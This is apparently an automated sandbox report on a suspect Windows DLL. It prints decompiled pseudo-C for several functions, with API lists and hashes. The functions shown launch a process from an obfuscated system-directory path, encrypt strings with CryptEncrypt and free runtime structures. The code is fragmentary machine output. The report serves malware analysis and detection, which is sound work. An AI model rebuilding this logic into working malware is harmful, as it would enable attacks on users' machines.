                                                                                                                                                  Function 677023DC, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 141processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E677023DC(void* __edi, void* __esp, signed long long __rbx, signed int __rcx, void* __rdx) {
				void* __rsi;
				int _t55;
				void* _t63;
				int _t66;
				void* _t102;
				void* _t104;
				void* _t105;
				signed int _t106;
				void* _t110;
				signed long long _t115;
				signed long long _t116;
				signed int _t118;
				long long _t120;
				signed long long _t124;
				void* _t147;
				signed int _t160;
				void* _t163;
				void* _t165;
				signed long long _t166;
				void* _t176;
				WCHAR* _t178;

				_t121 = __rbx;
				_t107 = __esp;
				_t99 = __edi;
				 *((long long*)(_t165 + 0x18)) = __rbx;
				_t163 = _t165 - 0xbe0;
				_t166 = _t165 - 0xce0;
				_t115 =  *0x67716000; // 0x9b7b11e8241
				_t116 = _t115 ^ _t166;
				 *(_t163 + 0xbd0) = _t116;
				_t160 = __rcx;
				_t176 = __rdx;
				_t124 = _t163 + 0x230;
				_t55 = GetSystemDirectoryW(_t178);
				r14d = 0x123;
				if(_t55 != 0) {
					asm("repne scasw");
					malloc(??);
					_t148 =  !(_t124 | 0xffffffff) - 1 + 1;
					_t168 = _t163 + 0x230;
					_t121 = _t116;
					E67707F34(_t116, _t116,  !(_t124 | 0xffffffff) - 1 + 1, _t163 + 0x230);
					memset(__edi, 0, 0x208 << 0);
					_t107 = __esp + 0xc;
					_t99 = __edi + 0x208;
					_t112 = _t121;
					if(_t121 != 0) {
						E67707F34(_t116, _t163 - 0x20, _t148, _t121);
						_t168 = "\\";
						E67707AD0(_t116, _t163 - 0x20, _t148, "\\");
						free(??);
					}
				}
				E67701160(_t112, _t116, _t121, "c95a6a89b9858c94094853d9", _t160, _t168);
				E67707AD0(_t116, _t163 - 0x20, _t178, _t116);
				free(??);
				E67703B5C(_t105, _t116, _t121, _t176, _t160);
				 *(_t166 + 0x38) = _t116;
				 *(_t166 + 0x30) = ",";
				_t118 = "\"";
				 *(_t166 + 0x28) = _t118;
				 *(_t166 + 0x20) = _t160;
				E67707158(L"%s%s%s%s%s", L" \"");
				free(??);
				_t174 = _t163 - 0x20;
				 *(_t166 + 0x20) = _t163 + 0x440;
				_t171 = L"%s%s";
				E67707158(L"%s%s", _t163 - 0x20);
				_t63 = memset(_t99 + 0x246, memset(_t99, 0, 0x246 << 0), 0x2d6 << 0);
				_t27 = _t118 + 0x68; // 0x68
				_t102 = _t27;
				r8d = _t102;
				E67709420(_t63, 0, 0, _t166 + 0x70, _t163 + 0x440, L"%s%s");
				 *(_t166 + 0x50) =  *(_t166 + 0x50) & 0x00000000;
				 *(_t166 + 0x58) = _t118;
				 *(_t166 + 0x60) = _t118;
				 *((long long*)(_t166 + 0x48)) = _t166 + 0x50;
				_t120 = _t166 + 0x70;
				_t147 = _t163 + 0x720;
				 *((long long*)(_t166 + 0x40)) = _t120;
				 *(_t166 + 0x38) =  *(_t166 + 0x38) & 0x00000000;
				 *(_t166 + 0x30) =  *(_t166 + 0x30) & 0x00000000;
				 *(_t166 + 0x28) =  *(_t166 + 0x28) & 0x00000000;
				 *(_t166 + 0x20) =  *(_t166 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				 *(_t166 + 0x70) = _t102;
				_t66 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				_t106 = GetLastError();
				memset(_t102, 0, 0x4a6 << 0);
				_t110 = _t107 + 0x24;
				_t49 = _t120 + 0xa; // 0xa
				_t104 = _t49;
				_t113 = _t66;
				if(_t66 == 0) {
					_t104 = 0xe;
				} else {
					_t106 =  *(_t166 + 0x60);
				}
				CloseHandle();
				CloseHandle(??);
				E677060CC(_t104, _t106, _t104, _t110, _t113, _t121, _t147, _t171, _t174);
				return E67706F80(_t104,  *(_t163 + 0xbd0) ^ _t166);
			}
























                                                                                                                                                  0x677023dc
                                                                                                                                                  0x677023dc
                                                                                                                                                  0x677023dc
                                                                                                                                                  0x677023dc
                                                                                                                                                  0x677023e8
                                                                                                                                                  0x677023f0
                                                                                                                                                  0x677023f7
                                                                                                                                                  0x677023fe
                                                                                                                                                  0x67702401
                                                                                                                                                  0x67702408
                                                                                                                                                  0x6770240b
                                                                                                                                                  0x6770240e
                                                                                                                                                  0x6770241a
                                                                                                                                                  0x67702420
                                                                                                                                                  0x67702428
                                                                                                                                                  0x67702437
                                                                                                                                                  0x67702444
                                                                                                                                                  0x67702449
                                                                                                                                                  0x6770244d
                                                                                                                                                  0x67702457
                                                                                                                                                  0x6770245a
                                                                                                                                                  0x6770246d
                                                                                                                                                  0x6770246d
                                                                                                                                                  0x6770246d
                                                                                                                                                  0x6770246f
                                                                                                                                                  0x67702472
                                                                                                                                                  0x6770247e
                                                                                                                                                  0x67702483
                                                                                                                                                  0x67702491
                                                                                                                                                  0x67702499
                                                                                                                                                  0x67702499
                                                                                                                                                  0x67702472
                                                                                                                                                  0x677024a5
                                                                                                                                                  0x677024b7
                                                                                                                                                  0x677024bf
                                                                                                                                                  0x677024c7
                                                                                                                                                  0x677024da
                                                                                                                                                  0x677024e9
                                                                                                                                                  0x677024ee
                                                                                                                                                  0x677024fc
                                                                                                                                                  0x67702506
                                                                                                                                                  0x6770250b
                                                                                                                                                  0x67702513
                                                                                                                                                  0x6770251f
                                                                                                                                                  0x67702523
                                                                                                                                                  0x67702528
                                                                                                                                                  0x6770253b
                                                                                                                                                  0x6770255b
                                                                                                                                                  0x6770255d
                                                                                                                                                  0x6770255d
                                                                                                                                                  0x67702565
                                                                                                                                                  0x67702568
                                                                                                                                                  0x6770256d
                                                                                                                                                  0x67702575
                                                                                                                                                  0x6770257a
                                                                                                                                                  0x67702584
                                                                                                                                                  0x67702589
                                                                                                                                                  0x6770258e
                                                                                                                                                  0x67702595
                                                                                                                                                  0x6770259a
                                                                                                                                                  0x677025a0
                                                                                                                                                  0x677025a6
                                                                                                                                                  0x677025ab
                                                                                                                                                  0x677025b0
                                                                                                                                                  0x677025b3
                                                                                                                                                  0x677025b8
                                                                                                                                                  0x677025bc
                                                                                                                                                  0x677025d1
                                                                                                                                                  0x677025da
                                                                                                                                                  0x677025da
                                                                                                                                                  0x677025dc
                                                                                                                                                  0x677025dc
                                                                                                                                                  0x677025df
                                                                                                                                                  0x677025e1
                                                                                                                                                  0x677025e9
                                                                                                                                                  0x677025e3
                                                                                                                                                  0x677025e3
                                                                                                                                                  0x677025e3
                                                                                                                                                  0x677025f3
                                                                                                                                                  0x677025fe
                                                                                                                                                  0x67702608
                                                                                                                                                  0x67702632

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32 ref: 6770241A
                                                                                                                                                  • malloc.LIBCMT ref: 67702444
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                    • Part of subcall function 67707F34: _errno.LIBCMT ref: 67707F53
                                                                                                                                                    • Part of subcall function 67707F34: _invalid_parameter_noinfo.LIBCMT ref: 67707F5F
                                                                                                                                                    • Part of subcall function 67707F34: _errno.LIBCMT ref: 67707F8F
                                                                                                                                                    • Part of subcall function 67707AD0: _errno.LIBCMT ref: 67707AEF
                                                                                                                                                    • Part of subcall function 67707AD0: _invalid_parameter_noinfo.LIBCMT ref: 67707AFB
                                                                                                                                                  • free.LIBCMT ref: 67702499
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • free.LIBCMT ref: 677024BF
                                                                                                                                                  • swprintf.LIBCMT ref: 6770250B
                                                                                                                                                  • free.LIBCMT ref: 67702513
                                                                                                                                                  • swprintf.LIBCMT ref: 6770253B
                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 677025BC
                                                                                                                                                  • GetLastError.KERNEL32 ref: 677025C4
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 677025F3
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 677025FE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$free$CloseErrorHandleHeapLast_invalid_parameter_noinfoswprintf$AllocateCreateDirectoryFreeProcessSystem_callnewhmalloc
                                                                                                                                                  • String ID: %s%s$%s%s%s%s%s$c95a6a89b9858c94094853d9
                                                                                                                                                  • API String ID: 188247552-554724872
                                                                                                                                                  • Opcode ID: 13169a3116b0590786804134e297a570cc395d8c650a58a575dc93bcfa4a0cfe
                                                                                                                                                  • Instruction ID: 928f415b2dd49195f5c6eafe7c4bec26fd6cb9bfda4f7550f74896f24e1057ba
                                                                                                                                                  • Opcode Fuzzy Hash: 13169a3116b0590786804134e297a570cc395d8c650a58a575dc93bcfa4a0cfe
                                                                                                                                                  • Instruction Fuzzy Hash: 7E517C72318B849AEB10CB60E9543EAB3E2F78879CF844526DB4E57B58DF78C255CB40
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770AA74, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                  			E6770AA74(long long __rbx, void* __rcx, void* __rdi, long long __rsi, void* _a8, long long _a16) {
				void* _t25;
				int _t26;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr _t47;
				intOrPtr* _t57;
				long long _t59;
				void* _t61;
				void* _t62;
				void* _t65;

				_t59 = __rsi;
				_t43 = __rcx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t62 = _t61 - 0x20;
				_t36 =  *((intOrPtr*)(__rcx + 0x128));
				_t40 = __rcx;
				if( *((intOrPtr*)(__rcx + 0x128)) != 0) {
					__rcx = 0x677171d0;
					if(__rax != 0x677171d0) {
						__rax =  *((intOrPtr*)(__rbx + 0x110));
						if(__rax != 0 &&  *__rax == 0) {
							__rcx =  *((intOrPtr*)(__rbx + 0x120));
							if(__rcx != 0 &&  *__rcx == 0) {
								free();
								__rcx =  *((intOrPtr*)(__rbx + 0x128));
								__eax = E6770F510(__eax,  *((intOrPtr*)(__rbx + 0x128)));
							}
							__rcx =  *((intOrPtr*)(__rbx + 0x118));
							if(__rcx != 0 &&  *__rcx == 0) {
								free();
								__rcx =  *((intOrPtr*)(__rbx + 0x128));
								__eax = E6770F4A4(__eax,  *((intOrPtr*)(__rbx + 0x128)));
							}
							__rcx =  *((intOrPtr*)(__rbx + 0x110));
							free(??);
							__rcx =  *((intOrPtr*)(__rbx + 0x128));
							free(??);
						}
					}
				}
				_t37 =  *((intOrPtr*)(_t40 + 0x130));
				if(_t37 != 0 &&  *_t37 == 0) {
					free();
					free(??);
					free(??);
					free(??);
				}
				_t44 =  *((intOrPtr*)(_t40 + 0x158));
				if(_t44 != 0x677166e0 &&  *((intOrPtr*)(_t44 + 0x160)) == 0) {
					_t25 = E6770F0B4(_t25, _t44);
					free(??);
				}
				_t57 = _t40 + 0x58;
				do {
					_t36 = 0x677166d4;
					if( *((intOrPtr*)(_t57 - 0x10)) != 0x677166d4) {
						_t45 =  *_t57;
						if(_t45 != 0 &&  *_t45 == 0) {
							free();
						}
					}
					if( *((long long*)(_t57 - 8)) != 0) {
						_t46 =  *((intOrPtr*)(_t57 + 8));
						if(_t46 != 0 &&  *_t46 == 0) {
							free();
						}
					}
					_t57 = _t57 + 0x20;
					_t59 = _t59 - 1;
				} while (_t59 != 0);
				_t43 = _t40;
				_t40 = _a8;
				_t62 = _t62 + 0x20;
				if(_t43 == 0) {
					return _t25;
				} else {
					_t65 = _t43;
					_t47 =  *0x67717990; // 0x1dea9f10000
					_t26 = HeapFree(_t40, ??);
					if(_t26 == 0) {
						E6770851C(_t36);
						_t26 = E677084D4(GetLastError(), _t36, _t47, _t65);
						 *_t36 = _t26;
					}
					return _t26;
				}
			}
















                                                                                                                                                  0x6770aa74
                                                                                                                                                  0x6770aa74
                                                                                                                                                  0x6770aa74
                                                                                                                                                  0x6770aa79
                                                                                                                                                  0x6770aa7f
                                                                                                                                                  0x6770aa83
                                                                                                                                                  0x6770aa8a
                                                                                                                                                  0x6770aa90
                                                                                                                                                  0x6770aa92
                                                                                                                                                  0x6770aa9c
                                                                                                                                                  0x6770aa9e
                                                                                                                                                  0x6770aaa8
                                                                                                                                                  0x6770aaaf
                                                                                                                                                  0x6770aab9
                                                                                                                                                  0x6770aac0
                                                                                                                                                  0x6770aac5
                                                                                                                                                  0x6770aacc
                                                                                                                                                  0x6770aacc
                                                                                                                                                  0x6770aad1
                                                                                                                                                  0x6770aadb
                                                                                                                                                  0x6770aae2
                                                                                                                                                  0x6770aae7
                                                                                                                                                  0x6770aaee
                                                                                                                                                  0x6770aaee
                                                                                                                                                  0x6770aaf3
                                                                                                                                                  0x6770aafa
                                                                                                                                                  0x6770aaff
                                                                                                                                                  0x6770ab06
                                                                                                                                                  0x6770ab06
                                                                                                                                                  0x6770aaa8
                                                                                                                                                  0x6770aa9c
                                                                                                                                                  0x6770ab0b
                                                                                                                                                  0x6770ab15
                                                                                                                                                  0x6770ab2a
                                                                                                                                                  0x6770ab3e
                                                                                                                                                  0x6770ab4d
                                                                                                                                                  0x6770ab59
                                                                                                                                                  0x6770ab59
                                                                                                                                                  0x6770ab5e
                                                                                                                                                  0x6770ab6f
                                                                                                                                                  0x6770ab7a
                                                                                                                                                  0x6770ab86
                                                                                                                                                  0x6770ab86
                                                                                                                                                  0x6770ab8b
                                                                                                                                                  0x6770ab94
                                                                                                                                                  0x6770ab94
                                                                                                                                                  0x6770ab9f
                                                                                                                                                  0x6770aba1
                                                                                                                                                  0x6770aba7
                                                                                                                                                  0x6770abae
                                                                                                                                                  0x6770abae
                                                                                                                                                  0x6770aba7
                                                                                                                                                  0x6770abb8
                                                                                                                                                  0x6770abba
                                                                                                                                                  0x6770abc1
                                                                                                                                                  0x6770abc8
                                                                                                                                                  0x6770abc8
                                                                                                                                                  0x6770abc1
                                                                                                                                                  0x6770abcd
                                                                                                                                                  0x6770abd1
                                                                                                                                                  0x6770abd1
                                                                                                                                                  0x6770abd6
                                                                                                                                                  0x6770abd9
                                                                                                                                                  0x6770abe3
                                                                                                                                                  0x67706fa3
                                                                                                                                                  0x67706fdc
                                                                                                                                                  0x67706fa5
                                                                                                                                                  0x67706faa
                                                                                                                                                  0x67706fad
                                                                                                                                                  0x67706fb6
                                                                                                                                                  0x67706fbe
                                                                                                                                                  0x67706fc0
                                                                                                                                                  0x67706fd0
                                                                                                                                                  0x67706fd5
                                                                                                                                                  0x67706fd5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706fdb

                                                                                                                                                  APIs
                                                                                                                                                  • __free_lconv_mon.LIBCMT ref: 6770AACC
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F52E
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F540
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F552
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F564
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F576
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F588
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F59A
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F5AC
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F5BE
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F5D0
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F5E5
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F5FA
                                                                                                                                                    • Part of subcall function 6770F510: free.LIBCMT ref: 6770F60F
                                                                                                                                                  • free.LIBCMT ref: 6770AAC0
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • free.LIBCMT ref: 6770AAE2
                                                                                                                                                  • __free_lconv_num.LIBCMT ref: 6770AAEE
                                                                                                                                                  • free.LIBCMT ref: 6770AAFA
                                                                                                                                                  • free.LIBCMT ref: 6770AB06
                                                                                                                                                  • free.LIBCMT ref: 6770AB2A
                                                                                                                                                  • free.LIBCMT ref: 6770AB3E
                                                                                                                                                  • free.LIBCMT ref: 6770AB4D
                                                                                                                                                  • free.LIBCMT ref: 6770AB59
                                                                                                                                                  • free.LIBCMT ref: 6770AB86
                                                                                                                                                  • free.LIBCMT ref: 6770ABAE
                                                                                                                                                  • free.LIBCMT ref: 6770ABC8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                                                                                                                                  • String ID: ($qg
                                                                                                                                                  • API String ID: 518839503-2658405053
                                                                                                                                                  • Opcode ID: 3d4765b141f84fd10967727fd31b4a2f51fafc7f542d6ba07b3287f04de12886
                                                                                                                                                  • Instruction ID: 7ef6d2917763898aa35242603eaf1b8f5864f2b65b53760bd84413e817eb646d
                                                                                                                                                  • Opcode Fuzzy Hash: 3d4765b141f84fd10967727fd31b4a2f51fafc7f542d6ba07b3287f04de12886
                                                                                                                                                  • Instruction Fuzzy Hash: E4313AB2216A8089EF05CF61D6A43AC23A1EB8CB9CF451832CB1E8B658DF78D5D1C751
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67703EAC, Relevance: 24.1, APIs: 16, Instructions: 140COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,67703E95,?,?,?,67703CB0), ref: 67703EBA
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,67703E95,?,?,?,67703CB0), ref: 67703ED4
                                                                                                                                                  • GetFileSecurityW.ADVAPI32 ref: 67704036
                                                                                                                                                  • GetLastError.KERNEL32 ref: 67704040
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Attributes$ErrorLastSecurity
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2498390648-0
                                                                                                                                                  • Opcode ID: eadf4b4f98f99bc74c6617181f842bbdff3ed21b032f1a42efd64e7239dbfaa0
                                                                                                                                                  • Instruction ID: 144c6e437fedb8625f73f3191c771090261130e78905530e9458aeb4d559ee8e
                                                                                                                                                  • Opcode Fuzzy Hash: eadf4b4f98f99bc74c6617181f842bbdff3ed21b032f1a42efd64e7239dbfaa0
                                                                                                                                                  • Instruction Fuzzy Hash: 03517872708B409AEB00CF71E58479D33A5FB59B8CF84052AEA4D5BB18EF39C659C740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67706A7C, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 107stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                  			E67706A7C(void* __ecx, void* __edi, void* __esp, void* __eflags, signed long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, signed long long _a8, long long _a16, long long _a24) {
				signed long long _v24;
				void* _v44;
				signed int _v60;
				void* _v1032;
				char _v1044;
				char _v1056;
				void* __rdi;
				void* _t39;
				void* _t69;
				void* _t70;
				void* _t74;
				void* _t77;
				signed long long _t79;
				signed long long _t80;
				signed long long _t133;
				void* _t135;
				void* _t139;

				_t139 = __r9;
				_t138 = __r8;
				_t129 = __rsi;
				_t82 = __rbx;
				_t77 = __eflags;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t79 =  *0x67716000; // 0x9b7b11e8241
				_t80 = _t79 ^ _t135 - 0x00000420;
				_v24 = _t80;
				E67701000(__rbx, "cb5c6599c17ecb903e5248a3", __rdx, __r8);
				lstrcpyA(??, ??);
				free(??);
				E67703938(0xc, __esp, _t80, _t82, 0x67712f89, __rsi, _t138);
				malloc(??);
				_t133 = _t80;
				memset(__edi, 0, 0x50 << 0);
				_t74 = __esp + 0xc;
				_t69 = __edi + 0x50;
				E677069A8(_t80, _t80, _t80, __rsi, _t133, _t138);
				E677039E8(_t69, _t74, _t80, _t80, _t80, _t80);
				lstrcatA(??, ??);
				free(??);
				lstrlenA(??);
				_t10 = _t80 + 1; // 0x1
				E67703938(_t10, _t74, _t80, _t80,  &_v1044, _t129, _t138);
				_t84 = _t80;
				memset(_t69, 0, 0x3ee << 0);
				_t75 = _t74 + 0xc;
				_t70 = _t69 + 0x3ee;
				_t39 = E6770441C(0, _t10, _t70, _t74 + 0xc, _t77, _t80, _t80,  &_v1044, _t80, _t129, _t133, _t138);
				E67704578(_t39, 0, _t10, _t80, _t80, _t80, _t139);
				 *_t133 = _t80;
				E677039E8(_t70, _t74 + 0xc, _t80, _t80, _t80,  &_v1044);
				E67701000(_t84, "ce5c7353b388cdd1475242a27c7c68b3", _t80, _t138);
				lstrcpyA(??, ??);
				free(??);
				E67703938(0xc, _t74 + 0xc, _t80, _t84, 0x67712f95, _t80, _t138);
				E677069A8(_t84, _t80, _t80, _t80, _t133, _t138);
				E677039E8(_t70, _t74 + 0xc, _t80, _t80, _t80, _t80);
				lstrcatA(??, ??);
				free(??);
				lstrlenA(??);
				_t17 = _t80 + 1; // 0x1
				E67703938(_t17, _t75, _t80, _t80,  &_v1056, _t80, _t138);
				E67704578(memset(_t70, 0, 0x3ee << 0), 0, _t17, _t80, _t80, _t80, _t139);
				_a8 = _t80;
				E677039E8(_t70 + 0x3ee, _t75 + 0xc, _t80, _t80, _t80,  &_v1056);
				E677039E8(_t70 + 0x3ee, _t75 + 0xc, _t80, _t80, _t80,  &_v1056);
				return E67706F80(0, _v60 ^ _t135 - 0x00000420);
			}




















                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a7c
                                                                                                                                                  0x67706a81
                                                                                                                                                  0x67706a86
                                                                                                                                                  0x67706a93
                                                                                                                                                  0x67706a9a
                                                                                                                                                  0x67706a9d
                                                                                                                                                  0x67706aac
                                                                                                                                                  0x67706abc
                                                                                                                                                  0x67706ac5
                                                                                                                                                  0x67706ad6
                                                                                                                                                  0x67706ae5
                                                                                                                                                  0x67706aef
                                                                                                                                                  0x67706af4
                                                                                                                                                  0x67706af4
                                                                                                                                                  0x67706af4
                                                                                                                                                  0x67706af9
                                                                                                                                                  0x67706b04
                                                                                                                                                  0x67706b11
                                                                                                                                                  0x67706b1a
                                                                                                                                                  0x67706b24
                                                                                                                                                  0x67706b2f
                                                                                                                                                  0x67706b32
                                                                                                                                                  0x67706b41
                                                                                                                                                  0x67706b46
                                                                                                                                                  0x67706b46
                                                                                                                                                  0x67706b46
                                                                                                                                                  0x67706b48
                                                                                                                                                  0x67706b56
                                                                                                                                                  0x67706b5e
                                                                                                                                                  0x67706b62
                                                                                                                                                  0x67706b6e
                                                                                                                                                  0x67706b7e
                                                                                                                                                  0x67706b87
                                                                                                                                                  0x67706b98
                                                                                                                                                  0x67706ba3
                                                                                                                                                  0x67706bae
                                                                                                                                                  0x67706bbb
                                                                                                                                                  0x67706bc4
                                                                                                                                                  0x67706bce
                                                                                                                                                  0x67706bd9
                                                                                                                                                  0x67706bdc
                                                                                                                                                  0x67706bf8
                                                                                                                                                  0x67706c00
                                                                                                                                                  0x67706c04
                                                                                                                                                  0x67706c0c
                                                                                                                                                  0x67706c3c

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 67706ABC
                                                                                                                                                  • free.LIBCMT ref: 67706AC5
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • malloc.LIBCMT ref: 67706AE5
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                    • Part of subcall function 677069A8: malloc.LIBCMT ref: 677069F4
                                                                                                                                                    • Part of subcall function 677069A8: lstrlenA.KERNEL32(?,?,00000000,67706AFE), ref: 67706A15
                                                                                                                                                    • Part of subcall function 677069A8: free.LIBCMT ref: 67706A5A
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67706B11
                                                                                                                                                  • free.LIBCMT ref: 67706B1A
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67706B24
                                                                                                                                                    • Part of subcall function 6770441C: malloc.LIBCMT ref: 67704454
                                                                                                                                                    • Part of subcall function 6770441C: free.LIBCMT ref: 6770446E
                                                                                                                                                    • Part of subcall function 6770441C: free.LIBCMT ref: 677044A6
                                                                                                                                                    • Part of subcall function 67704578: CryptImportKey.ADVAPI32 ref: 677045E1
                                                                                                                                                    • Part of subcall function 67701000: rand.LIBCMT ref: 677010D6
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 67706B7E
                                                                                                                                                  • free.LIBCMT ref: 67706B87
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67706BBB
                                                                                                                                                  • free.LIBCMT ref: 67706BC4
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67706BCE
                                                                                                                                                    • Part of subcall function 67704578: malloc.LIBCMT ref: 677045F5
                                                                                                                                                    • Part of subcall function 67704578: CryptEncrypt.ADVAPI32 ref: 6770462E
                                                                                                                                                    • Part of subcall function 67704578: free.LIBCMT ref: 6770463B
                                                                                                                                                    • Part of subcall function 67704578: CryptDestroyKey.ADVAPI32 ref: 6770465C
                                                                                                                                                  Strings
                                                                                                                                                  • ce5c7353b388cdd1475242a27c7c68b3, xrefs: 67706B67
                                                                                                                                                  • cb5c6599c17ecb903e5248a3, xrefs: 67706AA5
                                                                                                                                                  Memory Dump Source
